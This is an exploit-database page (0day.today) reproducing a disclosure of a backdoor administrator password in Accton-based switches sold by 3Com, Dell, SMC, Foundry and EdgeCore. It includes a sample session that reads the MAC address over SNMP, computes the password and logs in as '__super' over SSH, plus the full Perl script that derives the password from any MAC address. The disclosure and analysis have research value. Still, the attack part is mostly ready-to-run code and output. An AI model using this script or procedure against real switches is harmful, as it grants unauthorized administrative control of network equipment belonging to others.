0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Accton-based switches (3com, Dell, SMC, Foundry, EdgeCore) Backdoor
=================================================================== Accton-based switches (3com, Dell, SMC, Foundry, EdgeCore) Backdoor =================================================================== On the 15th of august 2009, at the HAR2009 conference, the existence of a backdoor password in Accton-based switches was revealed by Edwin Eefting, Erik Smit and Erwin Drent [1][2]. Even though this is a >365-day exploit, it does not seem to be listed in any of the vulnerability databases. Also, I could not find a patch for any of the vulnerable devices. According to the researchers, they contacted 3Com and Accton, but did not receive a response. I have a vulnerable 3Com 3812 in my lab and contacted the 3Com SRT months ago, but did not receive a response either. This seems to be a forgotten bug... The Accton company builds switches, which are rebranded and sold by several manufacturers (including 3Com, Dell, SMC, Foundry and EdgeCore). The researchers list at least the 3Com 3812, 3Com 3870 and Edgecore ES4649 as vulnerable[3], but other vendors are affected as well. For example, I could also reproduce the behavior on a Dell PowerConnect 5224 switch. The backdoor password can be calculated if you have the switch MAC-address, which can be obtained via ARP or SNMP (if you know the community string). It seems to work on all management interfaces: telnet, ssh and http. If you don't know the MAC-address but can guess the OUI, brute forcing the password is probably feasible as well. A perl script (accton.pl) to calculate the password from the MAC address is available at [4]. I'm hoping as a result of this e-mail, this will end up in vulnerability databases, scanners etc. I believe more vulnerable devices will show up as people start scanning their networks. A sample SSH session with my 3Com 3812, running the latest available firmware (2.00): $ snmpget -v1 -c public 192.168.104.99 IF-MIB::ifPhysAddress.1001 IF-MIB::ifPhysAddress.1001 = STRING: 0:d:54:9d:1b:90 $ perl accton.pl 0:d:54:9d:1b:90 !F!RELUO $ ssh __super@192.168.104.99 __super@192.168.104.99's password: !F!RELUO Menu options: -------3Com SuperStack 3 Switch 3812 12-port--------------------- bridge - Administer bridge-wide parameters feature - Administer system features gettingStarted - Basic device configuration logout - Logout of the Command Line Interface physicalInterface - Administer physical interfaces protocol - Administer protocols security - Administer security system - Administer system-level functions trafficManagement - Administer traffic management Type ? for help. ------------------------------------- (1)-------------------------------------- Select menu option: -------------------------------------references-------------------------------- [1] HAR2009 talk https://har2009.org/program/events/103.en.html <https://har2009.org/program/events/103.en.html> [2] HAR2009 slides http://www.vettebak.nl/hak/ <http://www.vettebak.nl/hak/> [3] Backdoor description http://stuff.zoiah.net/doku.php?id=accton:backdoor <http://stuff.zoiah.net/doku.php?id=accton:backdoor> [4] Exploit calculator http://www.vettebak.nl/hak/accton.pl <http://www.vettebak.nl/hak/accton.pl> ---------------------------------------EOF------------------------------------- #!/usr/bin/perl -w use strict; # Accton Mercury "__super" user proof of concept # Disassembling and first PoC - smite@zylon.net. # Disassembling and math - psy@datux.nl, gido@datux.nl my $counter; my $char; my $mac = $ARGV[0]; my @mac; foreach my $octet (split (":", $mac)) { push @mac, hex($octet); } if (!defined $mac[5]) { print "Usage: ./accton.pl 00:01:02:03:04:05\n"; exit 1; } sub printchar { my ($char) = @_; $char = $char % 0x4b; if ($char <= 9 || ($char > 0x10 && $char < 0x2a) || $char > 0x30) { print pack("c*", $char+0x30); } else { print "!"; } } for ($counter=0;$counter<5;$counter++) { $char = $mac[$counter]; $char = $char + $mac[$counter+1]; printchar($char); } for ($counter=0;$counter<3;$counter++) { $char = $mac[$counter]; $char = $char + $mac[$counter+1]; $char = $char + 0xF; printchar($char); } print "\n"; # Vereenvoudiging van de loop: # Was dit: # $r11 = ($char * $key) >> 0x23; # $r10 = $char >> 0x1F; # $r9 = $r11 - $r10; # $r11 = $r9 << 2; # $r11 = $r11 + $r9; # $r9 = $r11 << 4; # $r9 = $r9 - $r11; # $char = $char - $r9; # $char = $char & 0xff; # Alles substen en bitshifts omrekenen: # # $char = $char - ( (( ( (($char * $key) / 34359738368) - ($char / 2147483648)) * 4 ) + ((($char * $key) / 34359738368) - ($char / 2147483648) ) ) * 15) ; # Vervolgens vereenvoudigen: # # $char = $char - ( # # ( # # ( ( # # (($char * $key) / 34359738368) - ($char / 2147483648) # # ) * 4 ) # # + # # ( # # (($char * $key) / 34359738368) - ($char / 2147483648) # # ) # # ) * 15 # # ) ; # # $char = $char - ( # # ( # # ( ( # # 4*( ($char * $key) / 34359738368) - 4*($char / 2147483648) # # ) ) # # + # # ( # # (($char * $key) / 34359738368) - ($char / 2147483648) # # ) # # ) * 15 # # ) ; # Termen die afgerond altijd 0 zijn vallen weg! # print "char is $char (max is 510)\n"; # print 510 / 2147483648 ."\n"; # print "\n"; # Dit kun je zien als bitshifts die alle bits naar rechts shiften: # # $char = $char - ( # # ( # # ( ( # # (4* ( $char * $key / 34359738368) ) # # ) ) # # + # # ( # # (($char * $key) / 34359738368) - ($char / 2147483648) # # ) # # ) * 15 # # ) ; # # $char = $char - ( # # ( # # ( ( # # (4* ( $char * $key / 34359738368) ) # # ) ) # # + # # ( # # (($char * $key) / 34359738368) # # ) # # ) * 15 # # ) ; # # $char = $char - ( # # ( # # ( ( # # (5* ( $char * $key / 34359738368) ) # # ) ) # # ) * 15 # # ) ; # # $char = $char - (75* ( $char * $key / 34359738368) ) ; # # Dit is een shift naar rechts van 35: # # $char = $char - (75* ( $char * $key >> 35) ) ; # PWNED! ;) # #after printing out all the possible combinations, the only thing left was a modulo function!!! #double pownage!! # my $output; # for ($char=0;$char<=0x1FE;$char++) { # $output = $char - (75 * (($char * 0x1B4E81B5 ) >> 35) ) ; # # my $cool; # $cool = $char % 75 ; # # if ($cool != $output) # { # print "$char word $output en is cool $cool\n"; # } # } # 0day.today [2024-09-29] #